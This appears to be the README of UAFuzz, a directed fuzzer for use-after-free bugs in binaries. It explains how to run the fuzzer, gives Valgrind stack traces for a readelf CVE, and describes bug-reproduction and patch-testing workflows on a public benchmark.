Our fuzzer is built upon AFL v2.52b in QEMU mode for fuzzing and BINSEC for lightweight static analysis (see uafuzz/README.md). We currently use IDA Pro v6.9 to extract control flow graphs (CFGs) and call graph of the tested binary (see ida/README.md).

uafuzz
├── binsec/src
│   ├── ida: a plugin to import and process IDA's CFGs and call graph
│   └── uafuzz: fuzzing code
│       ├── afl-2.52b: core fuzzing built on top of AFL-QEMU
│       └── uafuzz_*.ml(i): a plugin to compute static information and communicate with AFL-QEMU
└── scripts: some scripts for building and bug triaging

Application 1: Bug reproduction

We first consider a simple UAF bug. Neither AFL-QEMU nor even the directed fuzzer AFLGo with source-level targets can detect this bug within 6 hours, while UAFuzz detects it within minutes with the help of a Valgrind UAF report.

# Run AFL-QEMU
$UAFUZZ_PATH/tests/example.sh aflqemu 360
# Run AFLGo given targets at source-level
$UAFUZZ_PATH/tests/example.sh aflgo 360
# Run UAFuzz
$UAFUZZ_PATH/tests/example.sh uafuzz 360 $UAFUZZ_PATH/tests/example/example.valgrind

For real-world programs, we use the UAF Fuzzing Benchmark for our evaluations.

# Checkout the benchmark
git clone https://github.com/strongcourage/uafbench.git
cd uafbench; export UAFBENCH_PATH=`pwd`

We show in detail how to run UAFuzz for the bug reproduction application on CVE-2018-20623 of readelf (Binutils). The stack traces of this UAF bug obtained by Valgrind are as follows:

    // stack trace for the bad Use
==5358== Invalid read of size 1
==5358== at 0x40A9393: vfprintf (vfprintf.c:1632)
==5358== by 0x40A9680: buffered_vfprintf (vfprintf.c:2320)
==5358== by 0x40A72E0: vfprintf (vfprintf.c:1293)
[6] ==5358== by 0x80AB881: error (elfcomm.c:43)
[5] ==5358== by 0x8086217: process_archive (readelf.c:19409)
[1] ==5358== by 0x80868EA: process_file (readelf.c:19588)
[0] ==5358== by 0x8086B01: main (readelf.c:19664)

// stack trace for the Free
==5358== Address 0x4221dc0 is 0 bytes inside a block of size 80 free'd
==5358== at 0x402D358: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
[4] ==5358== by 0x8086647: process_archive (readelf.c:19524)
[1] ==5358== by 0x80868EA: process_file (readelf.c:19588)
[0] ==5358== by 0x8086B01: main (readelf.c:19664)

// stack trace for the Alloc
==5358== Block was alloc'd at
==5358== at 0x402C17C: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
[3] ==5358== by 0x80AD97E: make_qualified_name (elfcomm.c:906)
[2] ==5358== by 0x8086350: process_archive (readelf.c:19435)
[1] ==5358== by 0x80868EA: process_file (readelf.c:19588)
[0] ==5358== by 0x8086B01: main (readelf.c:19664)

1. Preprocessing

The preprocessing script takes the x86 binary under test and the Valgrind stack traces as inputs, then generates the UAF bug trace, which is a sequence of target locations in the format (basic_block_address,function_name), like the following:

[0] (0x8086ae1,main) -> [1] (0x80868de,process_file) -> [2] (0x808632c,process_archive) -> 
[3, alloc] (0x80ad974,make_qualified_name) -> [4, free] (0x808663a,process_archive) ->
[5] (0x808620b,process_archive) -> [6, use] (0x80ab86a,error)

2. Fuzzing

We provide a fuzzing script template with several input parameters, for example the fuzzer we want to run, the timeout in minutes, and the predefined targets (e.g., extracted from the bug report). For the example above, we use the script CVE-2018-20623.sh and run UAFuzz as follows:

# Run UAFuzz with timeout 60 minutes
$UAFBENCH_PATH/CVE-2018-20623.sh uafuzz 60 $UAFBENCH_PATH/valgrind/CVE-2018-20623.valgrind

3. Triaging

After the fuzzing timeout, UAFuzz identifies which inputs cover all target locations of the expected UAF bug trace in sequence (e.g., input names ending with ',all'). UAFuzz then triages only those inputs, which are the most likely to trigger the desired bug, using existing profiling tools like Valgrind or AddressSanitizer.
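
A hedged sketch of this triaging step, assuming an AFL-style queue directory and readelf's -a option; adapt paths and program arguments to your run:

# Re-run every candidate input (name ending in ',all') under Valgrind
for f in output/queue/*,all; do
  valgrind --error-exitcode=42 ./readelf -a "$f" > /dev/null 2>&1 \
    || echo "potential UAF reproducer: $f"
done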


Application 2: Patch testing

We use CVE-2018-6952 of GNU Patch to illustrate the importance of producing different unique bug-triggering inputs to aid the repair process. There was a double free in GNU Patch that was fixed by the developers (commit 9c98635). However, by using the stack traces of CVE-2018-6952, UAFuzz discovered an incomplete bug fix, CVE-2019-20633, in the latest version 2.7.6 (commit 76e7758), with a slight difference in the bug trace. Overall, the process is similar to the bug reproduction application, except that some manual work may be required to identify the target UAF bug trace. We use PoC inputs of existing bugs and valid files from fuzzing-corpus as high-quality seeds.

# Fuzz patched version of CVE-2018-6952
$UAFBENCH_PATH/CVE-2019-20633.sh uafuzz 360 $UAFBENCH_PATH/valgrind/CVE-2018-6952.valgrind

Application 3: Static analysis report verification

A possible hybrid approach is to combine UAFuzz with GUEB, which is the only binary-level static analyzer for UAF (written in OCaml). However, GUEB produces many false positives and is currently not able to handle complex binaries properly. We are therefore improving GUEB and integrating it into BINSEC, so that targets extracted from GUEB's reports can guide UAFuzz. Stay tuned!


